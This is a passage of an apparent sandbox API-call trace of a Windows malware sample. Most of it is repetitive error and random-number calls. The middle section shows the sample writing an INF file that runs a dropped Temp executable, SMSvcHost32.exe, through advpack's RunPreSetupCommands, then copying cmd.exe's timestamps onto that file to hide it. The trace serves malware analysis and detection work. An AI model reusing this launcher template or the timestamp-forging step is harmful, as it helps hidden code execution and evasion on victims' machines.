	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.538] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.539] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] GetLastError () returned 0x6
	[0103.540] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.541] GetLastError () returned 0x6
	[0103.542] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.542] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.542] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.543] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.543] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.543] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.543] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.543] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.543] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.544] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.544] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.544] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.544] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.544] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.545] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.545] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.545] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.545] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.545] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.546] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.546] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.546] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.546] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.546] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.546] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.547] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.547] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.547] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.547] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.547] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.548] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.548] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.548] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.548] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.548] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.549] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.549] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.549] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.549] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.549] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.549] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.550] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.550] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.550] wsprintfW (in: param_1=0x39bb1d8, param_2="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = %s:2\r\n\r\n[%s]\r\n%s\r\n" | out: param_1="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = pbjhqeoyjtoyhxsqrboyyzdhlqfxdcdpdlrxaywydajuleyhvrselgyqrkrnhhj:2\r\n\r\n[pbjhqeoyjtoyhxsqrboyyzdhlqfxdcdpdlrxaywydajuleyhvrselgyqrkrnhhj]\r\nC:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\r\n") returned 328
	[0103.550] lstrlenW (lpString="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = pbjhqeoyjtoyhxsqrboyyzdhlqfxdcdpdlrxaywydajuleyhvrselgyqrkrnhhj:2\r\n\r\n[pbjhqeoyjtoyhxsqrboyyzdhlqfxdcdpdlrxaywydajuleyhvrselgyqrkrnhhj]\r\nC:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\r\n") returned 328
	[0103.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = pbjhqeoyjtoyhxsqrboyyzdhlqfxdcdpdlrxaywydajuleyhvrselgyqrkrnhhj:2\r\n\r\n[pbjhqeoyjtoyhxsqrboyyzdhlqfxdcdpdlrxaywydajuleyhvrselgyqrkrnhhj]\r\nC:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\r\n", cchWideChar=-1, lpMultiByteStr=0x3988a20, cbMultiByte=658, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = pbjhqeoyjtoyhxsqrboyyzdhlqfxdcdpdlrxaywydajuleyhvrselgyqrkrnhhj:2\r\n\r\n[pbjhqeoyjtoyhxsqrboyyzdhlqfxdcdpdlrxaywydajuleyhvrselgyqrkrnhhj]\r\nC:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\r\n", lpUsedDefaultChar=0x0) returned 329
	[0103.550] StrDupW (lpSrch="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe"
	[0103.550] GetLastError () returned 0x6
	[0103.550] GetLastError () returned 0x6
	[0103.550] GetLastError () returned 0x6
	[0103.550] GetLastError () returned 0x6
	[0103.550] GetLastError () returned 0x6
	[0103.550] GetLastError () returned 0x6
	[0103.550] GetLastError () returned 0x6
	[0103.550] GetLastError () returned 0x6
	[0103.550] GetLastError () returned 0x6
	[0103.550] GetLastError () returned 0x6
	[0103.550] GetLastError () returned 0x6
	[0103.550] GetLastError () returned 0x6
	[0103.550] GetLastError () returned 0x6
	[0103.551] GetLastError () returned 0x6
	[0103.551] GetLastError () returned 0x6
	[0103.551] GetLastError () returned 0x6
	[0103.551] GetLastError () returned 0x6
	[0103.551] GetLastError () returned 0x6
	[0103.551] GetLastError () returned 0x6
	[0103.551] GetLastError () returned 0x6
	[0103.551] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x35
	[0103.551] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf", lpDst=0x39c55e0, nSize=0x35 | out: lpDst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf") returned 0x35
	[0103.551] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690
	[0103.551] GetSystemTime (in: lpSystemTime=0x29afe54 | out: lpSystemTime=0x29afe54*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0xd, wHour=0xe, wMinute=0x2, wSecond=0x7, wMilliseconds=0x317)) 
	[0103.551] SystemTimeToFileTime (in: lpSystemTime=0x29afe54, lpFileTime=0x29afe98 | out: lpFileTime=0x29afe98) returned 1
	[0103.551] SystemTimeToFileTime (in: lpSystemTime=0x29afe54, lpFileTime=0x29afea0 | out: lpFileTime=0x29afea0) returned 1
	[0103.551] SystemTimeToFileTime (in: lpSystemTime=0x29afe54, lpFileTime=0x29afea8 | out: lpFileTime=0x29afea8) returned 1
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.551] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.552] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] GetLastError () returned 0xb7
	[0103.553] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\system32\\cmd.exe", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x1c
	[0103.553] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\system32\\cmd.exe", lpDst=0x703d10, nSize=0x1c | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c
	[0103.553] CreateFileW (lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x694
	[0103.554] GetFileTime (in: hFile=0x703d10, lpCreationTime=0x29afe98, lpLastAccessTime=0x29afea0, lpLastWriteTime=0x29afea8 | out: lpCreationTime=0x29afe98*(dwLowDateTime=0x4d290c80, dwHighDateTime=0x1d2e1e2), lpLastAccessTime=0x29afea0*(dwLowDateTime=0x4d290c80, dwHighDateTime=0x1d2e1e2), lpLastWriteTime=0x29afea8*(dwLowDateTime=0x4d290c80, dwHighDateTime=0x1d2e1e2)) returned 0
	[0103.554] SystemTimeToFileTime (in: lpSystemTime=0x29afe54, lpFileTime=0x29afe98 | out: lpFileTime=0x29afe98) returned 1
	[0103.554] SystemTimeToFileTime (in: lpSystemTime=0x29afe54, lpFileTime=0x29afea0 | out: lpFileTime=0x29afea0) returned 1
	[0103.554] SystemTimeToFileTime (in: lpSystemTime=0x29afe54, lpFileTime=0x29afea8 | out: lpFileTime=0x29afea8) returned 1
	[0103.554] CloseHandle (hObject=0x694) returned 1
	[0103.554] WriteFile (in: hFile=0x690, lpBuffer=0x3988a20*, nNumberOfBytesToWrite=0x148, lpNumberOfBytesWritten=0x29afeb0, lpOverlapped=0x0 | out: lpBuffer=0x3988a20*, lpNumberOfBytesWritten=0x29afeb0*=0x148, lpOverlapped=0x0) returned 1
	[0103.555] SetEndOfFile (hFile=0x690) returned 1
	[0103.555] SetFileTime (hFile=0x690, lpCreationTime=0x29afe98, lpLastAccessTime=0x29afea0, lpLastWriteTime=0x29afea8) returned 1
	[0103.555] FlushFileBuffers (hFile=0x690) returned 1
	[0103.557] CloseHandle (hObject=0x690) returned 1
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.558] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
